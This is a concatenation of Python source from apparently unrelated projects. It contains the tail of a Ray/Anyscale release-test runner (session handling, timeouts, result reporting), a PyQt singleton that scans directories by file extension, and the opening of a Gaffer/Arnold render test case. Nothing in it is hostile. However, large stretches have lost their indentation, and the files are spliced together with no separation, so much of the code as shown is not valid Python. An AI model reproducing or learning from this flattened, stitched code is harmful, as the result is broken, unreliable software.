                    session_controller=session_controller)
            except Exception as exc:
                raise RuntimeError(f"Could not get remote json content "
                                   f"for session {session.name}") from exc

            if session_state.get("test_name") == test_name:
                return session.id, session.name, session_state

        # Bug fix: advance the paging token used in the query. Previously the
        # next token was stored in a separate variable (`session_token`), so
        # the query always re-fetched the first page and could loop forever.
        paging_token = result.metadata.next_paging_token
        if not paging_token:
            return None
def get_latest_running_command_id(sdk: AnyscaleSDK, session_id: str
                                  ) -> Tuple[Optional[str], Optional[bool]]:
    """Return the latest session command and the success status so far.

    Returns:
        Tuple ``(command_id, success)``. If an unfinished command is
        found, its ID is returned with ``success=None`` (still running).
        Otherwise the first-listed command ID is returned with ``success``
        indicating whether every finished command exited with status 0.
    """
    scd_id = None
    paging_token = None

    success = None

    # NOTE(review): if the session has no commands at all, this loop never
    # terminates (no results, token stays falsy) — confirm callers only use
    # this on sessions with at least one command.
    while not scd_id:
        result = sdk.list_session_commands(
            session_id=session_id, paging_token=paging_token)

        paging_token = result.metadata.next_paging_token

        for cmd in result.results:
            if not scd_id:
                # Remember the first command returned — presumably the
                # newest one; TODO confirm API ordering.
                scd_id = cmd.id

            completed = cmd.finished_at is not None

            if completed:
                if success is None:
                    success = True

                success = success and cmd.status_code == 0

            if not completed:
                return cmd.id, None

    return scd_id, success or False
def run_test_config(
local_dir: str,
project_id: str,
test_name: str,
test_config: Dict[Any, Any],
commit_url: str,
session_name: str = None,
smoke_test: bool = False,
no_terminate: bool = False,
kick_off_only: bool = False,
check_progress: bool = False,
upload_artifacts: bool = True,
app_config_id_override: Optional[str] = None,
) -> Dict[Any, Any]:
"""
Returns:
Dict with the following entries:
status (str): One of [finished, error, timeout]
command_link (str): Link to command (Anyscale web UI)
last_logs (str): Last logs (excerpt) to send to owner
artifacts (dict): Dict of artifacts
Key: Name
Value: S3 URL
"""
# Todo (mid-term): Support other cluster definitions
# (not only cluster configs)
cluster_config_rel_path = test_config["cluster"].get(
"cluster_config", None)
cluster_config = _load_config(local_dir, cluster_config_rel_path)
app_config_rel_path = test_config["cluster"].get("app_config", None)
app_config = _load_config(local_dir, app_config_rel_path)
compute_tpl_rel_path = test_config["cluster"].get("compute_template", None)
compute_tpl = _load_config(local_dir, compute_tpl_rel_path)
stop_event = multiprocessing.Event()
result_queue = multiprocessing.Queue()
if not session_name:
session_name = f"{test_name}_{int(time.time())}"
temp_dir = tempfile.mkdtemp()
# Result and state files
results_json = test_config["run"].get("results", None)
if results_json is None:
results_json = "/tmp/release_test_out.json"
state_json = test_config["run"].get("state", None)
if state_json is None:
state_json = "/tmp/release_test_state.json"
env_vars = {
"RAY_ADDRESS": os.environ.get("RAY_ADDRESS", "auto"),
"TEST_OUTPUT_JSON": results_json,
"TEST_STATE_JSON": state_json,
"IS_SMOKE_TEST": "1" if smoke_test else "0",
}
with open(os.path.join(local_dir, ".anyscale.yaml"), "wt") as f:
f.write(f"project_id: {project_id}")
os.chdir(local_dir)
# Setup interface
# Unfortunately, there currently seems to be no great way to
# transfer files with the Anyscale SDK.
# So we use the session controller instead.
sdk = AnyscaleSDK(auth_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"])
session_controller = SessionController(
api_client=instantiate_api_client(
cli_token=GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"],
host=GLOBAL_CONFIG["ANYSCALE_HOST"],
),
anyscale_api_client=sdk.api_client,
)
timeout = test_config["run"].get("timeout", 1800)
if "RELEASE_OVERRIDE_TIMEOUT" in os.environ:
previous_timeout = timeout
timeout = int(os.environ.get("RELEASE_OVERRIDE_TIMEOUT", str(timeout)))
logger.warning(f"Release test timeout override: {timeout} "
f"(would have been {previous_timeout})")
# If a test is long running, timeout does not mean it failed
is_long_running = test_config["run"].get("long_running", False)
build_id_override = None
if test_config["run"].get("use_connect"):
autosuspend_mins = test_config["run"].get("autosuspend_mins", 5)
assert not kick_off_only, \
"Unsupported for running with Anyscale connect."
if app_config_id_override is not None:
logger.info(
"Using connect and an app config override, waiting until "
"build finishes so we can fetch the app config in order to "
"install its pip packages locally.")
build_id_override = wait_for_build_or_raise(
sdk, app_config_id_override)
response = sdk.get_cluster_environment_build(build_id_override)
app_config = response.result.config_json
install_app_config_packages(app_config)
install_matching_ray()
elif "autosuspend_mins" in test_config["run"]:
raise ValueError(
"'autosuspend_mins' is only supported if 'use_connect' is True.")
# Add information to results dict
def _update_results(results: Dict):
if "last_update" in results:
results["last_update_diff"] = time.time() - results["last_update"]
if smoke_test:
results["smoke_test"] = True
def _process_finished_command(session_controller: SessionController,
scd_id: str,
results: Optional[Dict] = None,
runtime: int = None,
commit_url: str = None,
session_url: str = None):
logger.info("Command finished successfully.")
if results_json:
results = results or get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
else:
results = {"passed": 1}
_update_results(results)
if scd_id:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
else:
logs = "No command found to fetch logs for"
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=test_config.get("artifacts", {}),
session_controller=session_controller,
)
logger.info("Fetched results and stored on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
# Add these metadata here to avoid changing SQL schema.
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
# When running the test script in client mode, the finish command is a
# completed local process.
def _process_finished_client_command(returncode: int, logs: str):
if upload_artifacts:
saved_artifacts = pull_artifacts_and_store_in_cloud(
temp_dir=temp_dir,
logs=logs, # Also save logs in cloud
session_name=session_name,
test_name=test_name,
artifacts=None,
session_controller=None,
)
logger.info("Stored results on the cloud. Returning.")
else:
saved_artifacts = {}
logger.info("Usually I would have fetched the results and "
"artifacts and stored them on S3.")
if results_json:
results = get_local_json_content(local_file=results_json, )
else:
results = {
"passed": int(returncode == 0),
}
results["returncode"] = returncode
_update_results(results)
result_queue.put(
State(
"END",
time.time(),
{
"status": "finished",
"last_logs": logs,
"results": results,
"artifacts": saved_artifacts,
},
))
def _run(logger):
"""Drive one full release-test run against an Anyscale session.

Lifecycle: reuse or create a session (cluster-config path or
app-config/compute-template path), optionally run the whole test as an
Anyscale connect job, otherwise sync files up, run the optional prepare
command, run the test command, and collect results. Terminal state is
always communicated through `result_queue`; the session is cleaned up in
the `finally` block unless `no_terminate` is set.

NOTE: sdk, project_id, session_name, test_config, result_queue,
stop_event, etc. are closed over from the enclosing function (not
visible in this chunk).
"""
# These values will be set as the test runs.
session_url = None
runtime = None
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
session_id = None
scd_id = None
try:
# First, look for running sessions
session_id = search_running_session(sdk, project_id, session_name)
compute_tpl_name = None
app_config_id = app_config_id_override
app_config_name = None
build_id = build_id_override
if not session_id:
logger.info("No session found.")
# Start session
session_options = dict(
name=session_name, project_id=project_id)
if cluster_config is not None:
# NOTE(review): `logging.info` (root logger) is used here and
# below instead of the `logger` parameter — likely unintended.
logging.info("Starting session with cluster config")
cluster_config_str = json.dumps(cluster_config)
session_options["cluster_config"] = cluster_config_str
# NOTE(review): the trailing comma makes this a 1-tuple, so
# cloud_id is set to ("...",) rather than the bare ID string.
# Probably a bug — confirm against the Anyscale SDK.
session_options["cloud_id"] = (
GLOBAL_CONFIG["ANYSCALE_CLOUD_ID"], )
session_options["uses_app_config"] = False
else:
logging.info("Starting session with app/compute config")
# Find/create compute template
compute_tpl_id, compute_tpl_name = \
create_or_find_compute_template(
sdk, project_id, compute_tpl)
logger.info(f"Link to compute template: "
f"{anyscale_compute_tpl_url(compute_tpl_id)}")
# Find/create app config
if app_config_id is None:
(
app_config_id,
app_config_name,
) = create_or_find_app_config(sdk, project_id,
app_config)
else:
logger.info(
f"Using override app config {app_config_id}")
app_config_name = sdk.get_app_config(
app_config_id).result.name
if build_id is None:
# We might have already retrieved the build ID when
# installing app config packages locally if using
# connect, so only get the build ID if it's not set.
build_id = wait_for_build_or_raise(sdk, app_config_id)
session_options["compute_template_id"] = compute_tpl_id
session_options["build_id"] = build_id
session_options["uses_app_config"] = True
# Connect mode starts its own cluster via run_job below, so a
# session is only created for the non-connect path.
if not test_config["run"].get("use_connect"):
session_id = create_and_wait_for_session(
sdk=sdk,
stop_event=stop_event,
session_name=session_name,
session_options=session_options,
)
# --- Anyscale connect (client mode) path: run as a job and return. ---
if test_config["run"].get("use_connect"):
assert compute_tpl_name, "Compute template must exist."
assert app_config_name, "Cluster environment must exist."
script_args = test_config["run"].get("args", [])
if smoke_test:
script_args += ["--smoke-test"]
min_workers = 0
for node_type in compute_tpl["worker_node_types"]:
min_workers += node_type["min_workers"]
# Build completed, use job timeout
result_queue.put(State("CMD_RUN", time.time(), None))
returncode, logs = run_job(
cluster_name=test_name,
compute_tpl_name=compute_tpl_name,
cluster_env_name=app_config_name,
job_name=session_name,
min_workers=min_workers,
script=test_config["run"]["script"],
script_args=script_args,
env_vars=env_vars,
autosuspend=autosuspend_mins)
_process_finished_client_command(returncode, logs)
return
# --- Session (non-connect) path. ---
# Write test state json
test_state_file = os.path.join(local_dir, "test_state.json")
with open(test_state_file, "wt") as f:
json.dump({
"start_time": time.time(),
"test_name": test_name
}, f)
# Rsync up
logger.info("Syncing files to session...")
session_controller.push(
session_name=session_name,
source=None,
target=None,
config=None,
all_nodes=False,
)
logger.info("Syncing test state to session...")
session_controller.push(
session_name=session_name,
source=test_state_file,
target=state_json,
config=None,
all_nodes=False,
)
session_url = anyscale_session_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
session_id=session_id)
_check_stop(stop_event, "file_sync")
# Optionally run preparation command
prepare_command = test_config["run"].get("prepare")
if prepare_command:
logger.info(f"Running preparation command: {prepare_command}")
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=prepare_command,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_PREPARE")
_, _ = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_PREPARE")
# Run release test command
cmd_to_run = test_config["run"]["script"] + " "
args = test_config["run"].get("args", [])
if args:
cmd_to_run += " ".join(args) + " "
if smoke_test:
cmd_to_run += " --smoke-test"
scd_id, result = run_session_command(
sdk=sdk,
session_id=session_id,
cmd_to_run=cmd_to_run,
result_queue=result_queue,
env_vars=env_vars,
state_str="CMD_RUN")
if not kick_off_only:
_, runtime = wait_for_session_command_to_complete(
result,
sdk=sdk,
scd_id=scd_id,
stop_event=stop_event,
state_str="CMD_RUN")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
runtime=runtime,
session_url=session_url,
commit_url=commit_url)
else:
# Kick-off-only mode: report kickoff and leave the command running.
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": ""
}))
# NOTE(review): Exception already subsumes ReleaseTestTimeoutError;
# the tuple is redundant (the isinstance checks below distinguish).
except (ReleaseTestTimeoutError, Exception) as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
# Best effort: enrich the error with the remote command logs.
try:
logs = logs + "; Command logs:" + get_command_logs(
session_controller, scd_id,
test_config.get("log_lines", 50))
except Exception as e2:
logger.error(e2, exc_info=True)
# Long running tests are "finished" successfully when
# timed out
if isinstance(e, ReleaseTestTimeoutError) and is_long_running:
_process_finished_command(
session_controller=session_controller, scd_id=scd_id)
else:
# Map the exception type to a status string and a runtime value.
timeout_type = ""
runtime = None
if isinstance(e, CommandTimeoutError):
timeout_type = "timeout"
runtime = 0
elif (isinstance(e, PrepareCommandTimeoutError)
or isinstance(e, FileSyncTimeoutError)
or isinstance(e, SessionTimeoutError)
or isinstance(e, PrepareCommandRuntimeError)):
timeout_type = "infra_timeout"
runtime = None
elif isinstance(e, RuntimeError):
timeout_type = "runtime_error"
runtime = 0
else:
timeout_type = "unknown timeout"
runtime = None
# Add these metadata here to avoid changing SQL schema.
results = {}
results["_runtime"] = runtime
results["_session_url"] = session_url
results["_commit_url"] = commit_url
results["_stable"] = test_config.get("stable", True)
result_queue.put(
State(
"END", time.time(), {
"status": timeout_type,
"last_logs": logs,
"results": results
}))
finally:
if no_terminate:
logger.warning(
"`no_terminate` is set to True, so the session will "
"*not* be terminated!")
else:
_cleanup_session(sdk, session_id)
def _check_progress(logger):
"""Check on a previously kicked-off (long running) test.

Finds the existing session for `test_name`, fetches the remote results
json, optionally validates that it was updated recently enough
(`time_key` / `max_update_delay`), and either finalizes the run (on
timeout or command completion) or reports that it is still running.
Terminates the session in `finally` if a terminal state was reached.

NOTE: sdk, session_controller, temp_dir, test_config, timeout,
result_queue, etc. are closed over from the enclosing function (not
visible in this chunk).
"""
anyscale.conf.CLI_TOKEN = GLOBAL_CONFIG["ANYSCALE_CLI_TOKEN"]
should_terminate = False
session_id = None
scd_id = None
try:
existing_session = find_session_by_test_name(
sdk=sdk,
session_controller=session_controller,
temp_dir=temp_dir,
state_json=state_json,
project_id=project_id,
test_name=test_name)
if existing_session is None:
# Nothing to check on — report "nosession" and bail out.
logger.info(f"Found no existing session for {test_name}")
result_queue.put(
State("END", time.time(), {
"status": "nosession",
"last_logs": ""
}))
return
session_id, session_name, session_state = existing_session
logger.info(f"Found existing session for {test_name}: "
f"{session_name}")
scd_id, success = get_latest_running_command_id(
sdk=sdk, session_id=session_id)
latest_result = get_remote_json_content(
temp_dir=temp_dir,
session_name=session_name,
remote_file=results_json,
session_controller=session_controller,
)
# Fetch result json and check if it has been updated recently
result_time_key = test_config["run"].get("time_key", None)
maximum_update_delay = test_config["run"].get(
"max_update_delay", None)
if result_time_key and maximum_update_delay:
last_update = latest_result.get(result_time_key, None)
if not last_update:
result_queue.put(
State(
"END", time.time(), {
"status": "error",
"last_logs": f"Test did not store "
f"{result_time_key} in the "
f"results json."
}))
return
delay = time.time() - last_update
logger.info(f"Last update was at {last_update:.2f}. "
f"This was {delay:.2f} seconds ago "
f"(maximum allowed: {maximum_update_delay})")
if delay > maximum_update_delay:
# Treated as an error by the generic except handler below.
raise RuntimeError(
f"Test did not update the results json within "
f"the last {maximum_update_delay} seconds.")
if time.time() - session_state["start_time"] > timeout:
# Long running test reached timeout
logger.info(
f"Test command reached timeout after {timeout} seconds")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
elif success:
logger.info("All commands finished.")
_process_finished_command(
session_controller=session_controller,
scd_id=scd_id,
results=latest_result)
should_terminate = True
else:
rest_time = timeout - time.time() + session_state["start_time"]
logger.info(f"Test command should continue running "
f"for {rest_time} seconds")
result_queue.put(
State("END", time.time(), {
"status": "kickoff",
"last_logs": "Test is still running"
}))
except Exception as e:
logger.error(e, exc_info=True)
logs = str(e)
if scd_id is not None:
# Best effort: prepend the remote command logs to the error.
try:
logs = get_command_logs(session_controller, scd_id,
test_config.get("log_lines", 50))
logs += f"\n{str(e)}"
except Exception as e2:
logger.error(e2, exc_info=True)
result_queue.put(
State("END", time.time(), {
"status": "error",
"last_logs": logs
}))
should_terminate = True
finally:
if should_terminate:
logger.warning("Terminating session")
_cleanup_session(sdk, session_id)
# Launch either the run or the progress-check worker in a child process and
# supervise it: collect State updates from the queue, enforce the (build,
# then run) timeout, and return the final result dict.
if not check_progress:
process = multiprocessing.Process(target=_run, args=(logger, ))
else:
process = multiprocessing.Process(
target=_check_progress, args=(logger, ))
build_timeout = test_config["run"].get("build_timeout", 1800)
project_url = anyscale_project_url(
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"])
logger.info(f"Link to project: {project_url}")
msg = f"This will now run test {test_name}."
if smoke_test:
msg += " This is a smoke test."
if is_long_running:
msg += " This is a long running test."
logger.info(msg)
logger.info(f"Starting process with timeout {timeout} "
f"(build timeout {build_timeout})")
process.start()
# The timeout time will be updated after the build finished
# Build = App config + compute template build and session start
timeout_time = time.time() + build_timeout
result = {}
while process.is_alive():
try:
state: State = result_queue.get(timeout=1)
except (Empty, TimeoutError):
if time.time() > timeout_time:
stop_event.set()
logger.warning("Process timed out.")
if not is_long_running:
# Grace period so the worker can react to stop_event.
logger.warning("Terminating process in 10 seconds.")
time.sleep(10)
logger.warning("Terminating process now.")
process.terminate()
else:
logger.info("Process is long running. Give 2 minutes to "
"fetch result and terminate.")
start_terminate = time.time()
while time.time(
) < start_terminate + 120 and process.is_alive():
time.sleep(1)
if process.is_alive():
logger.warning("Terminating forcefully now.")
process.terminate()
else:
logger.info("Long running results collected.")
break
continue
if not isinstance(state, State):
# NOTE(review): the message interpolates `result`, but the object
# that failed the check is `state` — likely a typo.
raise RuntimeError(f"Expected `State` object, got {result}")
if state.state == "CMD_PREPARE":
# Reset timeout after build finished
timeout_time = state.timestamp + timeout
if state.state == "CMD_RUN":
# Reset timeout after prepare command or build finished
timeout_time = state.timestamp + timeout
elif state.state == "END":
result = state.data
break
# Drain any remaining states; the last one wins.
while not result_queue.empty():
state = result_queue.get_nowait()
result = state.data
logger.info("Final check if everything worked.")
try:
result.setdefault("status", "error (status not found)")
# NOTE(review): dict.setdefault raises neither TimeoutError nor Empty,
# so this except branch is dead code — probably a leftover from an
# earlier queue-based implementation.
except (TimeoutError, Empty):
result = {"status": "timeout", "last_logs": "Test timed out."}
logger.info(f"Final results: {result}")
log_results_and_artifacts(result)
shutil.rmtree(temp_dir)
return result
def run_test(test_config_file: str,
             test_name: str,
             project_id: str,
             commit_url: str,
             category: str = "unspecified",
             smoke_test: bool = False,
             no_terminate: bool = False,
             kick_off_only: bool = False,
             check_progress=False,
             report=True,
             session_name=None,
             app_config_id_override=None):
    """Load the test config file, run the named test and handle its result.

    Args:
        test_config_file: Path to the YAML file holding all test configs.
        test_name: Name of the test entry to run.
        project_id: Anyscale project to run the test in.
        commit_url: URL of the commit under test (stored with the results).
        category: Category label saved alongside the report.
        smoke_test: If True, merge the test's "smoke_test" overrides.
        no_terminate: If True, the session is left alive after the test.
        kick_off_only: Start the test but do not wait for completion.
        check_progress: Check on a previously kicked-off test instead.
        report: If True, upload artifacts and report results.
        session_name: Optional explicit session name.
        app_config_id_override: Optional app config ID overriding the config.

    Raises:
        ValueError: If `test_name` is not present in the config file.
        RuntimeError: If kickoff fails, or if the finished test errored.
    """
    with open(test_config_file, "rt") as f:
        test_configs = yaml.load(f, Loader=yaml.FullLoader)

    # Index the configs by their "name" key (removed from each entry).
    test_config_dict = {cfg.pop("name"): cfg for cfg in test_configs}

    if test_name not in test_config_dict:
        raise ValueError(
            f"Test with name `{test_name}` not found in test config file "
            f"at `{test_config_file}`.")
    test_config = test_config_dict[test_name]

    # Smoke tests overlay their own settings on top of the base config.
    if smoke_test and "smoke_test" in test_config:
        smoke_test_config = test_config.pop("smoke_test")
        test_config = _deep_update(test_config, smoke_test_config)

    local_dir = os.path.dirname(test_config_file)
    if "local_dir" in test_config:
        # local_dir is relative to test_config_file
        local_dir = os.path.join(local_dir, test_config["local_dir"])

    if test_config["run"].get("use_connect"):
        assert not kick_off_only, \
            "--kick-off-only is unsupported when running with " \
            "Anyscale connect."
        assert not check_progress, \
            "--check is unsupported when running with Anyscale connect."
        if test_config.get("artifacts", {}):
            logger.error(
                "Saving artifacts are not yet supported when running with "
                "Anyscale connect.")

    result = run_test_config(
        local_dir,
        project_id,
        test_name,
        test_config,
        commit_url,
        session_name=session_name,
        smoke_test=smoke_test,
        no_terminate=no_terminate,
        kick_off_only=kick_off_only,
        check_progress=check_progress,
        upload_artifacts=report,
        app_config_id_override=app_config_id_override)

    status = result.get("status", "invalid")

    if kick_off_only:
        if status != "kickoff":
            raise RuntimeError("Error kicking off test.")
        logger.info("Kicked off test. It's now up to the `--check` "
                    "part of the script to track its process.")
        return

    # `--check` or no kick off only
    if status == "nosession":
        logger.info(f"No running session found for test {test_name}, so "
                    f"assuming everything is fine.")
        return
    if status == "kickoff":
        logger.info(f"Test {test_name} is still running.")
        return

    last_logs = result.get("last_logs", "No logs.")
    test_suite = os.path.basename(test_config_file).replace(".yaml", "")
    report_kwargs = dict(
        test_suite=test_suite,
        test_name=test_name,
        status=status,
        logs=last_logs,
        results=result.get("results", {}),
        artifacts=result.get("artifacts", {}),
        category=category,
    )
    if report:
        report_result(**report_kwargs)
    else:
        logger.info(f"Usually I would now report the following results:\n"
                    f"{report_kwargs}")

    if has_errored(result):
        raise RuntimeError(last_logs)

    return
# Script entry point: parse CLI flags, resolve the Ray wheels to test
# against, and dispatch to run_test().
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description=__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument(
"--test-config", type=str, required=True, help="Test config file")
parser.add_argument("--test-name", type=str, help="Test name in config")
parser.add_argument(
"--ray-wheels", required=False, type=str, help="URL to ray wheels")
parser.add_argument(
"--no-terminate",
action="store_true",
default=False,
help="Don't terminate session after failure")
parser.add_argument(
"--no-report",
action="store_true",
default=False,
help="Do not report any results or upload to S3")
parser.add_argument(
"--kick-off-only",
action="store_true",
default=False,
help="Kick off only (don't wait for command to finish)")
parser.add_argument(
"--check",
action="store_true",
default=False,
help="Check (long running) status")
parser.add_argument(
"--category",
type=str,
default="unspecified",
help="Category name, e.g. `release-1.3.0` (will be saved in database)")
parser.add_argument(
"--smoke-test", action="store_true", help="Finish quickly for testing")
parser.add_argument(
"--session-name",
required=False,
type=str,
help="Name of the session to run this test.")
parser.add_argument(
"--app-config-id-override",
required=False,
type=str,
help=("An app config ID, which will override the test config app "
"config."))
args, _ = parser.parse_known_args()
if not GLOBAL_CONFIG["ANYSCALE_PROJECT"]:
raise RuntimeError(
"You have to set the ANYSCALE_PROJECT environment variable!")
maybe_fetch_api_token()
# NOTE(review): if `--check` is passed without `--ray-wheels`, neither
# branch below assigns `url`, so the `commit_url=url` argument further
# down raises NameError. Consider initializing `url = None` first.
if args.ray_wheels:
os.environ["RAY_WHEELS"] = str(args.ray_wheels)
url = str(args.ray_wheels)
elif not args.check:
url = find_ray_wheels(
GLOBAL_CONFIG["RAY_REPO"],
GLOBAL_CONFIG["RAY_BRANCH"],
GLOBAL_CONFIG["RAY_VERSION"],
)
if not url:
raise RuntimeError(f"Could not find wheels for "
f"Ray {GLOBAL_CONFIG['RAY_VERSION']}, "
f"branch {GLOBAL_CONFIG['RAY_BRANCH']}")
# RAY_COMMIT is set by find_ray_wheels
populate_wheels_sanity_check(os.environ.get("RAY_COMMIT", ""))
test_config_file = os.path.abspath(os.path.expanduser(args.test_config))
run_test(
test_config_file=test_config_file,
test_name=args.test_name,
project_id=GLOBAL_CONFIG["ANYSCALE_PROJECT"],
commit_url=url,
category=args.category,
smoke_test=args.smoke_test,
# Kick-off-only implies the session must survive this invocation.
no_terminate=args.no_terminate or args.kick_off_only,
kick_off_only=args.kick_off_only,
check_progress=args.check,
report=not args.no_report,
session_name=args.session_name,
app_config_id_override=args.app_config_id_override,
)
|
fsfilemanager.py | import threading
import os
from PyQt5.QtCore import QThread
from util.fslogger import FSLogger
from model.fstreeitem import FSTreeItem, FSExtensionType
from task.fsfilescannertask import FSFileScannerContext, FSFileScannerTask
class FSFileManager(object):
    """Singleton that scans a directory tree in a background thread and
    builds a flat list of FSTreeItem objects grouped by file extension.

    The scan result is exposed through `items`; setting `path` triggers a
    new asynchronous scan.
    """

    # Lock guarding lazy creation of the singleton instance.
    _INST_LOCK = threading.Lock()
    # The one shared instance (double-checked locking in get_instance).
    _INSTANCE = None

    @classmethod
    def get_instance(cls):
        """ Method for getting the only instance """
        if cls._INSTANCE is None:
            with cls._INST_LOCK:
                if cls._INSTANCE is None:
                    cls._INSTANCE = FSFileManager()
        assert cls._INSTANCE is not None
        return cls._INSTANCE

    def __new__(cls, *args, **kwargs):
        """ To make sure there will be only one instance """
        if not isinstance(cls._INSTANCE, cls):
            # BUGFIX: object.__new__ must not be given extra arguments in
            # Python 3 — forwarding *args/**kwargs raises TypeError as soon
            # as the constructor is called with any argument.
            cls._INSTANCE = object.__new__(cls)
        return cls._INSTANCE

    def __init__(self):
        # NOTE: __init__ runs on every FSFileManager() call even though
        # __new__ returns the shared instance, so state is re-initialized
        # each time — existing behavior, kept as-is.
        self._logger = FSLogger.get_instance()
        self._path = "."       # directory currently being managed
        self._items = list()   # flat list of FSTreeItem scan results

    @property
    def path(self):
        """Directory currently being scanned."""
        return self._path

    @path.setter
    def path(self, value):
        # Setting the path kicks off a fresh asynchronous scan.
        assert os.path.isdir(value)
        self._path = value
        self.update()

    @property
    def items(self):
        """Flat list of FSTreeItem objects from the most recent scan."""
        return self._items

    def update(self):
        """Rescan `path` asynchronously in a worker thread."""
        self._logger.info("Launch thread ..")
        update_thread = threading.Thread(target=self.update_w)
        update_thread.start()
        self._logger.info("Done")

    def update_w(self):
        """Worker: walk `path` and rebuild `items` grouped by extension.

        Builds one "Extensions" root item, one child item per distinct file
        extension, and one leaf item per file, all appended to the flat
        `items` list.
        """
        self._logger.info("Scanning files in %s", self.path)
        self.items.clear()
        extension_items = dict()
        root_item = FSTreeItem("Extensions", FSExtensionType.TYPE_EXTENSION, path=None, parent=None)
        self.items.append(root_item)
        for root, dirs, files in os.walk(self.path):
            for file in files:
                extension = os.path.splitext(file)[1]
                # Idiom fix: membership test on the dict, not on .keys().
                if extension not in extension_items:
                    extension_items[extension] = FSTreeItem(extension, FSExtensionType.TYPE_EXTENSION, path=None,
                                                            parent=root_item)
                extension_item = extension_items[extension]
                self.items.append(
                    FSTreeItem(file, FSExtensionType.TYPE_FILE, path=os.path.join(root, file), parent=extension_item))
        self._logger.info("%d items found", len(self.items))
|
ArnoldRenderTest.py | ##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import inspect
import unittest
import subprocess32 as subprocess
import threading
import arnold
import imath
import IECore
import IECoreImage
import IECoreScene
import IECoreArnold
import Gaffer
import GafferTest
import GafferDispatch
import GafferImage
import GafferScene
import GafferSceneTest
import GafferOSL
import GafferArnold
import GafferArnoldTest
class ArnoldRenderTest( GafferSceneTest.SceneTestCase ) :
def setUp( self ) :
"""Run base-class setup and pick a per-test script path in the temp dir."""
GafferSceneTest.SceneTestCase.setUp( self )
self.__scriptFileName = self.temporaryDirectory() + "/test.gfr"
def tearDown( self ) :
"""Run base-class teardown and deregister the "Test" scene adaptor
(registered by some tests in this case; not visible in this chunk —
assumed safe to call unconditionally, TODO confirm)."""
GafferSceneTest.SceneTestCase.tearDown( self )
GafferScene.deregisterAdaptor( "Test" )
def testExecute( self ) :
    """Dispatching via `gaffer execute` in SceneDescriptionMode should
    write one .ass file per frame, with the expression substituting the
    frame number into the file name."""
    s = Gaffer.ScriptNode()
    s["plane"] = GafferScene.Plane()
    s["render"] = GafferArnold.ArnoldRender()
    s["render"]["mode"].setValue( s["render"].Mode.SceneDescriptionMode )
    s["render"]["in"].setInput( s["plane"]["out"] )
    s["expression"] = Gaffer.Expression()
    s["expression"].setExpression( "parent['render']['fileName'] = '" + self.temporaryDirectory() + "/test.%d.ass' % int( context['frame'] )" )
    s["fileName"].setValue( self.__scriptFileName )
    s.save()
    p = subprocess.Popen(
        "gaffer execute " + self.__scriptFileName + " -frames 1-3",
        shell=True,
        stderr = subprocess.PIPE,
    )
    p.wait()
    # `failIf`/`failUnless` are deprecated unittest aliases (removed in
    # Python 3.12); use the modern assertions instead.
    self.assertFalse( p.returncode )
    for i in range( 1, 4 ) :
        self.assertTrue( os.path.exists( self.temporaryDirectory() + "/test.%d.ass" % i ) )
def testWaitForImage( self ) :
    """The render task should block until the output image has been
    written to disk."""
    s = Gaffer.ScriptNode()
    s["plane"] = GafferScene.Plane()
    s["outputs"] = GafferScene.Outputs()
    s["outputs"].addOutput(
        "beauty",
        IECoreScene.Output(
            self.temporaryDirectory() + "/test.tif",
            "tiff",
            "rgba",
            {}
        )
    )
    s["outputs"]["in"].setInput( s["plane"]["out"] )
    s["render"] = GafferArnold.ArnoldRender()
